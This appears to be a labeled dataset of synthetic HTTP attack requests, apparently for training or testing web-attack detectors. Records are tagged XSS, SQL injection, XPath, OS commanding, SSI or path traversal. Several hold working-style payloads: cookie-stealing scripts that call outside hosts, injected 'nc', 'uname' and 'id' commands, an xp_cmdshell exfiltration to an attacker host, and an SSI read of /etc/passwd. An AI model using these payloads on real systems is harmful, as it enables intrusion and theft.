Start - Id: 48453
class: XPathInjection
GET /lVEU7QmOHMP/aCCY35oFqnV/oQk6IV-Kqa/ernee/olGySMuJformjOuid.php4?usth6en4=nxR2dsthtri&lpeshO3fhe=ttyoe9dm%3A%40N HTTP/1.0
Host: 57.48.223.77:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: seaT-zsntnits;q=0.1, latat-wsetoeho;q=0.9, teop-adaL0Rnt, StyeI-u4loh;q=0.5
Cache-Control: max-stale=63
Cookie: eroisogra=(i    <  count(wst/child::text())    and     j   <   count(taoo8/child::comment())    and    k    < count(av/child::*)   );b5mnkteolcI=tsrceeOrxlaioer
Date: Sat, 02 Oct 04 23:59:20 GMT
ETag: W/"_ELKnf_CcQeWr_tBoB"
From: eneaubeo@rwfp2t.be
If-Unmodified-Since: Sat, 03 Sep 05 20:07:11 CET
If-Match: *
Max-Forwards: 4365
Authorization: Basic Y291aTI0eWc6bm90YnB0bA==
Referer: http://u2ividul.de/ettnor.conf
TE: trailers
User-Agent: sebPiNra1RpshIr
UA-Disp: 3757,6891,16
UA-OS: Windows 95
UA-Color: color8
Via: FTP/2.5 120.57.209.183
Upgrade: rteaS/8.9, dl6i/1.1, Ipby/3.4, pfeM9r/9.1
X-Serial-Number: 881741666326313
----: ------------

null

End - Id: 48453
Start - Id: 46569
class: XSS
GET /eQ2cLn.jbfFuJD57.jpg?uu0o9odwiwsene=5205 HTTP/1.0
Host: www.enaf3wfEon.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: To1f3e=rtuts
Client-ip: 140.154.179.232
Cookie: 40a0tduicol=neottae;eeed=dih
Date: Sat, 11 Sep 04 09:26:04 GMT
ETag: W/"j97RIYas61cFc-Yzn"
Expect: erNalss=n3he9zcL
If-Modified-Since: Mon, 13 Sep 04 22:41:51 CET
If-Unmodified-Since: Sat, 16 Dec 06 13:09:33 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Jan 09 03:18:52 GMT
Max-Forwards: 350
MIME-Version: 3.9
Pragma: no-cache
Authorization: wliik utoisr4=1aIoo
Range: 70-
Referer: http://www.ouQNui1s.ch/lios/jtzsr8/7akeyas.tiff
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Match
User-Agent: &{[window.open('http://83.169.100.5/chst.asmx'+document.cookie);]};
UA-OS: WinNT
UA-Pixels: 5605x1554
Via: 1.0 www.dpl5xto.js, 0.0 102.56.149.124:1, 1.2 www.sahos.css
Transfer-Encoding: identity
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 061 www.jmFttlrn.js "lnQacp2ufeTocbi0I" 
X-Forwarded-For: 222.189.31.195
----: -----------------------------------------

null

End - Id: 46569
Start - Id: 44680
class: PathTransversal
POST /lxcco6oloFlntot8yt.js? HTTP/1.1
Content-Length: 140
Content-Language: n
Content-Encoding: deflate
Content-Location: /wumtje.asmx
Content-MD5: a29veWNveVJ1c1JzbmVhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 17:19:54 UTC
Host: 176.3.81.52
Connection: keep-alive
Accept: image/*, video/*;q=0.3, application/postscript
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.2, gzip, deflate, identity
Accept-Language: uzAudt-et
Cache-Control: min-fresh=24079
Client-ip: 153.69.134.128
Cookie: eirh=5987597;ntu=09396424;PTruzt=i+;75ceWn=lft;3iaxL4eresnrRo=409
Cookie2: $Version="2"
Date: Fri, 05 Oct 07 17:05:00 GMT
From: EeA0y@doscaiun.org
If-Modified-Since: Sun, 06 Aug 06 14:31:45 CET
If-Unmodified-Since: Tue, 24 Jan 06 21:55:55 GMT
If-None-Match: "T5kW99spjULW0Em0eCV"
Max-Forwards: 9
Pragma: no-cache
Authorization: Digest uri=/erfozed/rwh2iE/i5ah9l.css
Referer: /fhjmiy9/3h8m/Nmdk.bin
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 6.9; Ih-or; rv:7.8.9) Gecko/14899897
UA-OS: Windows 95
UA-Color: color8
Via: nnaun/4.9 www.tVercr.js, 8.3 www.ErrrGrlk.tiff
Transfer-Encoding: identity
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
----: -----------------

rias=collection(     file:///c:/zHI/koh0.xml     )&qAwwB4_=ged&hoevebEg=oiirjtddsb&sm=ollfRtiEt&Sty=3e&o5mDth6y61ueytd=ans

End - Id: 44680
Start - Id: 36672
class: OsCommanding
GET /hImdx/Ce5ajz1/eACOBDb_D@u43/gIIZt3w8Ms8a/seoeeirt/eHynohitnrezy5s/allRrcpQKOiRn7NKA/dOD1BdBzO_JjrHgpH6.x/rj@.aspx?msystem9Smail=ussh&ahetzqmgcrdrrae=phoo&BqR7mn%u4=sszlaw0sconnectf&6ihhatssnkibh=ilnkkbNy&po=aXhrasoeWUoIvstd&slxq6jk=a&.BgGUNY=778605581&rwrnrhxettehhwE=0193&uenitl1tauhd=4224536&E7=y-2P_ HTTP/1.0
Host: www.lnao.net
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 199.3.230.74
Cookie: iy2tat=7;tSt7gnpaci9tns=zDYgK3Bs9;boot.iniSetclochildt-9=9T8kbes9;dLpU8soU=)o9nn
Cookie2: $Version="2"
Date: Tue, 13 Jun 06 09:20:21 CET
From: iird5s2@iarDlAnto.net
If-Modified-Since: Wed, 20 Jul 05 10:19:52 GMT
If-Unmodified-Since: Tue, 04 Jul 06 06:48:36 GMT
If-Match: "9@pX57CchNp9si1QCv0"
If-None-Match: *
Max-Forwards: 9
Range: 50-4,41661-
Referer: /bbfeoa/9ls3dopo/eetm/uEbziao/iea4eEar.avi
TE: trailers,deflate;q=0.8,chunked;q=0.9
User-Agent: %0a nc    www.tinela.com   80   ;
UA-Pixels: 211x4085
Transfer-Encoding: deflate
Upgrade: k21de0/3.9, tcu/7.2, 6go/7.9, sirla/2.0, elb/6.0
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36672
Start - Id: 47107
class: XSS
GET /fdZ4/inHxD@-J8D/o89tgKG.3FXSC--h/omtzeltshrs2tufeirmr/egTo4SJrWEi.css?AfZanKqMfV%uA=l5lI&1otsnm2meua=%28%26m6&geRDS=%3Ca+href%3D+++%22about%3A%3Cs%26%2399%3Bript++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.elngli.com%2Fcgi-bin%2Farde.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E%22+%3E HTTP/1.0
Host: 67.248.11.184
Connection: l5unoel
Accept: image/png, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.8, compress
Accept-Language: oyr014a-mofuC;q=0.0, aWuawo-eizn;q=0.4
Cache-Control: no-transform
Client-ip: 7.50.56.44
Cookie: tet2SGw=t3-28-x7ToX;dhdscieeF2rt=thh
Cookie2: $Version="1"
Date: Tue, 09 Jan 07 05:25:08 GMT
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: lomt0=LhioK
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 11 Apr 09 06:35:13 GMT
If-Unmodified-Since: Mon, 06 Sep 04 18:16:09 CET
If-Match: "FtwP2xjSBs@1xEjn6"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM bXI4YTU4YmF1b3RvaW90YXlMNTNubXFlZmVsYXNQcmVtY29hdHJpdEU=
Authorization: NTLM OWltYzlHbmVyZXRuQk9jOGRtbm1ldW5sdzVyY3J0b3JtbmlNbG5vdHJhaUI=
Range: 74-7756,9-
Referer: http://www.yaaqtc.fr/iotsOe/tlrn/dfuai/wmtl.pl
TE: deflate;q=0.4
Trailer: Connection
User-Agent: Mozilla/6.5 (Windows; U; WinNT 2.5; 3t-fu; rv:0.5.7) Gecko/12907804
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2605x6191
Via: 6.6 www.rssuts1e.shtml:9459, FTP/9.5 www.0oge5e.tiff:14252, 6.7 www.yCieRsrR.tiff
Transfer-Encoding: deflate
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 236782108
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47107
Start - Id: 47567
class: XSS
GET /eBkBotRMTQDAYY/bX_jvKPF1BS/brWkQCaEMrMqiE.msf?li=scTPPEWwYnVo&eYvL5W=%3Cdiv+style++++%3D%22width%3A+++expression%28%5Bwindow.open%28%27http%3A%2F%2F176.33.190.38%2Fma.jsp%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22%3E&mRprsdilsr=+t&6ftoofiye3Nrsq=6selThlaEt&JAc_N5@-Aix=63602&ma1emon7irh9omt=ii&wqlubre=%27%5C&ewgvP=676584&e8Hywr=qZO&0sa=yda&rhlhaimdhnefE=9DZ1n&asujf83anl1Thre=rchQ_W HTTP/1.0
Host: www.saheeeinar.ch
Connection: keep-alive
Accept: audio/basic, audio/*, text/plain;q=0.5
Accept-Charset: x-mac-japanese;q=0.8, isiri-3342;q=0.0, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=413
Client-ip: 118.106.166.150
Cookie: amaoo=9nateiformnuap;se=77832;VdamdtTcosya=re64lizEouuQesEiat;nyeq3bpogi0yr7=57797554
Cookie2: $Version="4"
Date: Tue, 18 Sep 07 02:00:36 GMT
ETag: W/"U8aHqItHXJkmtXoCz4YF"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sun, 02 Nov 08 16:41:41 CET
If-Unmodified-Since: Wed, 09 Mar 05 20:12:53 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 23 May 07 03:52:07 CET
Max-Forwards: 282
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: et1vtr gmhadkba=incdte
Range: 946-214738,54330-8
Referer: /En7leu/jlgtmolh.avi
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 9.1; tg-dL; rv:2.5.7) Gecko/47788450
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 684x889
Via: 4.4 223.46.208.168:26876, 6.9 175.192.77.109, HTTP/5.1 117.93.85.241
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 080 16.181.246.224 "nOai1ghriikwtss" "Mon, 29 Aug 05 07:48:25 UTC"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47567
Start - Id: 42295
class: SqlInjection
GET /Z0j99Xh/c0reaneCntvetaaao/tqj8qTDvRlKQuif16/qXna8toNb/A5oadbeyp4huvnr/mS.jsp?lre=acit9nu&mueeayoiOtniun=T6ilntc&udnqotrd=6dt%26+eyme%5BexecdivRm%5B&Ek=oomsndsRv&p1s=t%28fes&thTEdhec1o5ommt=select+oioe++++from++ALL_USERS&YF3xterm.3l.wget=fat%24r++e%3EiiAl&g8Ntgntyhrsr=l&rgii=7348684&adrcY=vbscript9eIsuni&deieaeosqmdeke=1520&iKPyconnect0zX7=httpmL+h++ehpesbgi&Ytrue=ec%402DZzcZ&srto8est3mmsd=u58e&houozOaceni=13694 HTTP/1.1
Host: 110.233.1.245
Connection: keep-alive
Accept: video/mpeg;q=0.9
Accept-Charset: euc-kr;q=0.1, ks_c_5601-1987, iso-10646-ucs-2;q=0.7, x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: eeoaC=qeyh
Client-ip: 135.182.107.81
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Sat, 26 Jun 04 20:43:35 UTC
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Wed, 24 Dec 08 08:06:58 CET
If-Unmodified-Since: Sun, 20 Apr 08 09:32:20 CET
If-Match: "79N6weC8TiNHylJR"
If-None-Match: *
If-Range: Sun, 20 Apr 08 14:07:00 UTC
Max-Forwards: 98
MIME-Version: 4.6
Pragma: cr4Onn='t'
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: geSL smaxehu=eLdtQ
Range: -568889,-588214
Referer: http://staosd.gov/nheOee1e.cfm
TE: trailers,gzip;q=0.8,gzip
Trailer: Trailer
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 5.6; pt-in; rv:6.8.7) Gecko/66079256
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: HTTP/8.4 www.h8eedaq1.tiff:5411, 1.9 www.ahdeanUe.gif:400
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 61789071021088545
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42295
Start - Id: 42973
class: OsCommanding
GET /rOwherewTK6varWmidY0r/oDO6D1M.GrdRon6ib8c/tcenULVe/n0ixXchildNXF0Wj5.js? HTTP/1.1
Host: 157.223.222.9
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.0
Accept-Encoding: identity;q=0.9, deflate, gzip, identity, deflate
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 163.71.98.230
Cookie: nv=mail   2gtsiip@klo.htvdet.gov   <<     /tmp/wu.c  ;
Cookie2: $Version="4"
Date: Thu, 05 Aug 04 13:33:47 UTC
ETag: "meKd3jCIHLFMIt3Yay"
Expect: nren62
From: j1trn@ee7xn57ti.uk
If-Modified-Since: Tue, 29 Mar 05 20:14:10 GMT
If-Unmodified-Since: Mon, 22 Sep 08 20:37:05 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 460
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM MHlhcGNBN2FNeW1lcnRoZXNqYTgyc2thZVRuMnNvc3I3bnRlRWdpT28zc3I=
Authorization: Basic RGV0OWFkOm9ucXRm
Referer: http://cidNfiee.org/ra4tlcnz/efnuy.js
TE: gzip;q=0.2,chunked;q=0.5
User-Agent: asaaiiarut (aG856t; eX931BFjX; 5Pmmce; lpGA2h; eMzBsaFHsv)
UA-CPU: Sparc
UA-Disp: 404,617,8
Via: 1.2 139.119.170.178, FTP/0.3 www.rcesI.css
Transfer-Encoding: P0Gs
Upgrade: Cdqo/1.9, uerbii/0.1, rBrtd/7.5
Warning: 621 114.147.233.95:5 "oenOszaooNn6g1hEeE" 
X-Serial-Number: 95384867825293006400
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42973
Start - Id: 43270
class: OsCommanding
GET /lsrretseiy/yaoe/anncevbohVnehhFcfTs/geZWYV6G.lfWXa4r9/bzXPevdczwb7/pb1bIs/0leaHeceqsasbd/s@.html?RvW3=+%3B++++echo++%3B++w+++++%3B+++uname++-a%3B+id&zUcshsehdtcsh=92&ifoalosln=%40-%2479%5ByhMd%27thaving%27tlhecl&inmasx=93 HTTP/1.1
Host: www.ciPdn1mht.st
Connection: seleema
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale=051
Client-ip: 116.247.114.110
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="118"
Date: Tue, 19 Apr 05 05:10:19 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: 9htstsrd
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Thu, 16 Sep 04 18:24:47 UTC
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "O_-kZz9GkW_-wJe"
If-None-Match: "gI9RBgdlQP7swCAYg0"
If-Range: "7otNb1OZzov0mBdD"
Max-Forwards: 0
MIME-Version: 9.7
Pragma: j='eereeA'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Digest opaque="letle"
Range: 6444-90250,-039,9-0896
Referer: http://www.na4o5e8.org/hdoqpyjh/mtre5Rt.pl
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Range
User-Agent: f8a9pieihm/6.7.3.5.4
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: identity
Upgrade: ssdcl/3.5, Oax6/1.8, llo84/6.7, sec/1.4, rnduC/7.6
Warning: 934 17.5.242.239 "e3Wid9U2agIl" "Sat, 08 Aug 09 05:17:30 GMT"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 5980220981423198
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43270
Start - Id: 41708
class: SqlInjection
GET /usWEx1-/mo9jismscoueyowasxd.cfm?toagrrk8oso8a=OR++++%27hmtdgSeiH%27++%3D+++++N%27+++++%27&aaiaeisotsneahr=986958 HTTP/1.1
Host: www.s4nSihwal.biz
Connection: keep-alive
Accept: text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 172.131.139.23
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Fri, 06 Apr 07 09:25:22 GMT
ETag: "yd-YiEMcSH-2m1nfdR8x"
Expect: Aegwua7=keneAcmn;torumEet=iitsHovu
From: oo2sso@fOothntR.fr
If-Modified-Since: Thu, 17 Apr 08 09:51:22 GMT
If-Unmodified-Since: Fri, 22 Jul 05 20:23:29 GMT
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: "qFgmRnpRNUk82_NNw@h"
If-Range: Fri, 27 May 05 17:51:41 CET
Max-Forwards: 36
MIME-Version: 1.8
Pragma: p8U='h'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWFpYXVlazZpT25lbmVvbWhhZXNlUDJ0YVU0RXJVb3VpaQ==
Range: 864538-4,42725-309719
Referer: http://durnpn1.biz/nosoo/urirdsk/ueeiobs/eamwk8v.html
TE: chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 8.1; e6-Ie; rv:3.5.2) Gecko/99387257
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8765x189
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 196 174.84.69.81 "ewttXoTtla" 
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41708
Start - Id: 35025
class: SqlInjection
GET /UM/6Erl1vOZ7WFFe0/gq5_9/ee2piws9aoheoeh/jesmutilatLee3tSe3i/1eeeuAseoRvy/iOf/lHhiSbqfmz@FJ7/2nmmt6rt0c/o2-UrHO9Fyus/irhc4omBo.bin?bOrue=jG.DlcW&jjTT8nSxo=195&h5fa=nmi4gtes&5W@CQNElLPU=09425049&3oturcfoiaeEcnn=ne9no7ircpb&1iaabisanny=homehoog&wrltu=03529584&iInttI7lho=ROnonk&nuenobodg7osct4=2169653868&bmrpositionZ9IFt4iframe=898636842&ibkVOJb8xJcmd=prjsAIKmIeid HTTP/1.1
Host: 182.158.56.185
Connection: close
Accept-Charset: iso-8859-6;q=0.9, macintosh;q=0.6, windows-1250
Accept-Language: exec     xp_cmdshell 'bcp "select     *    from hlsehywt"   queryout     pwdump.exe -c  -Craw  -Shackersip    -Usa  -Ph8ck3r'
Client-ip: 112.163.2.243
If-Modified-Since: Tue, 17 Jun 08 06:54:17 GMT
If-Unmodified-Since: Thu, 12 Jun 08 03:37:08 GMT
If-None-Match: "bNezi4pbJPl49-Xl"
Max-Forwards: 4
Pragma: f9tlse='mrmtti86'
Authorization: irOaes stfee=o06E
Referer: /asulsrso/aedo/eirrs/lweioaLe.php
User-Agent: r1H.nHL http://www.farhf.de
Via: 5.6 12.155.94.10

null

End - Id: 35025
Start - Id: 49671
class: XPathInjection
GET /0NL-nUWp/8I0oNM/PG8TlPDwherepYa/tpenniit.css?sle2ers=48871+++++or+1%3C++++e7fxE%2Faie6eI%2FdADs%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D37%5D+++or+++++64%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&toEcyqetAtsm=doridIobject HTTP/1.1
Host: 179.25.230.207
Connection: close
Accept: audio/x-wav;q=0.6, video/quicktime
Accept-Charset: euc-kr;q=0.9, windows-1251;q=0.0, iso-8859-2;q=0.8, euc-cn, iso-8859-5
Accept-Encoding: *;q=0.0
Accept-Language: itM6dE-Utetw;q=0.6
Cache-Control: no-store
Client-ip: 74.210.240.133
Cookie: swrtca7Ti=ioiIbw;ilani4tbser4=egWlbAYFnpv;eomwe9u=64
Cookie2: $Version="1"
Date: Sat, 28 Oct 06 20:41:49 GMT
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 10 Nov 05 17:37:08 UTC
If-Unmodified-Since: Mon, 06 Mar 06 13:44:48 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jan 04 15:43:18 UTC
Max-Forwards: 632
MIME-Version: 5.9
Pragma: aS='emEtmhrw'
Proxy-Authorization: Daieeh fnea=l3o3no
Authorization: Basic cW9pb3NzOmVvdW5t
Range: -09
Referer: http://tmseee.net/Aaizm/Ne32o/Ieqa6ttt/ladJzYdm/sMrNd.msf
TE: trailers
Trailer: Range
User-Agent: qe2h0a/3.7.1.3.3
UA-CPU: Sparc
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: 7.3 www.beosnefe.shtml:962
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 731 www.em2ety7n.htm "ewloieirse6ett" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 40217863095
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49671
Start - Id: 39732
class: SSI
GET /rlkoju34q5zC9WrqA/m0xb8WmxD-/2oiodyte4uzh1mbas.asp?no9em9e4m=saDg78ar&eyldetezsrxb=j33maoleajt&zitssxtfc=985037&httsvvio=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&oretoasr4ctSsc=sarcptoeanr8&namhzeraSsernny=875&mp6ludytctoxoS=e&otxgee6utdtal9n=noiet1Wxro&eedesedd6=wqBF8&JJI4nN7H4S8B=goshsim0ub HTTP/1.0
Host: 222.177.200.19:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, x-mac-korean;q=0.9, windows-1252;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=63060
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="8"
Date: Sat, 03 Jul 04 03:56:15 GMT
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Fri, 14 Mar 08 12:02:49 GMT
If-Unmodified-Since: Mon, 24 May 04 12:13:56 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Jul 06 13:41:59 CET
Max-Forwards: 9
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Digest uri=/grdep.mspx
Range: -58,-7,-12255
Referer: /seHikcej/anne.pdf
TE: gzip
Trailer: Host
User-Agent: Mozilla/0.8 (X11; U; Linux i586 6.8; ee-ew; rv:6.1.4) Gecko/72761945
UA-CPU: Sparc
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 5.5 248.58.121.185, 0.5 235.82.229.117, 6.6 www.ten5.js
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39732
Start - Id: 39204
class: SSI
PUT /hVTli/ewreenoslNlt9rneiIiK/lfd2zi.nf@@8rb7XL/e7hot/lR2a/gxmbDCM-PYiuZ2MsSjNu.cfm? HTTP/1.0
Content-Length: 371
Content-Language: tim,a3lii,i3citrLt
Content-Encoding: compress
Content-Location: http://Seyi.st/nwcsemnn/norm/noe1t.jpg
Content-MD5: Y3N1dHlzaG9naHJ6N3JvRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 11:50:07 UTC
Last-Modified: Tue, 03 Apr 07 13:41:06 UTC
Host: www.qhlme.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 214.102.152.111
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Tue, 12 Jan 10 10:40:29 CET
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: egngmnl@let9lo.net
If-Modified-Since: Sat, 05 Nov 05 01:52:11 UTC
If-Unmodified-Since: Tue, 16 Jun 09 08:59:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Jun 08 09:05:41 UTC
Max-Forwards: 91
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Digest algorithm=gednec
Range: -6444
Referer: http://www.xdra.net/ayhiIdu/f5pussRa/2ftqn.shtml
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 3.0; mi-ri; rv:4.5.6) Gecko/76841950
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: gzip
Upgrade: Dhol4t/4.0
Warning: 744 www.catg.htm:87 "87Ei" "Tue, 03 Aug 04 15:36:35 UTC"
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kweFte=<!--#email fromhost="www.vrr8ai.com" tohost="mailbox.hn5.com" message="rumO ttmibwt thDi Ahw" fromaddress="lmiu.com" toaddress="oosuu.gzEreI.com" subject="hss" sender="yzp.com" replyto="ten8wso.com" cc="speh" inreplyto="aiai ee8 ltlrib" id="o9qmail" -->&asgsee=t3t9ywCO&rtyetceaohye=tEbNMGT

End - Id: 39204
Start - Id: 47791
class: XSS
GET /2V2x1csyOHDfHW0/iUzn_Tw2/9ennReuhif2ron7yzm.css?trmwioaen7iin=taCF&neeeev3zspi=+b3&ahqtdttbiYXyz=o+++++style%3Dleft%3Aexpression%28alert+%28s0e6r.eedgt5%29%29&0UyTb7ro4oB7=70 HTTP/1.1
Host: 141.180.255.82
Connection: ph5a77
Accept: video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: ueepea-r
Cache-Control: min-fresh=67
Client-ip: 235.195.152.232
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="10"
Date: Sun, 29 May 05 08:08:59 GMT
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Mon, 12 Sep 05 17:09:00 CET
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: "eUScTt6XclNmu77Ed"
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: "yVm2SX9bAjtG2XZN.5"
Max-Forwards: 215
MIME-Version: 9.4
Pragma: itl9loht=bubk
Proxy-Authorization: Digest username="oaid"
Authorization: NTLM YW53ZW5obWVybU1tZW5ldGxjbmg0Z2xhaW50aW9yZGFwOGM=
Range: 9830-
Referer: http://0eatieE.org/Tumu87e/ritijuf/npex/T2ceuJwo/oxhteae.zip
TE: gzip,gzip,gzip
Trailer: Accept-Language
User-Agent: Mozilla/7.3 (X11; U; SunOS sun4u 6.4; li-Ar; rv:9.5.4) Gecko/28198432
UA-CPU: x86
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 876x886
Via: FTP/6.6 221.109.192.7
Transfer-Encoding: compress
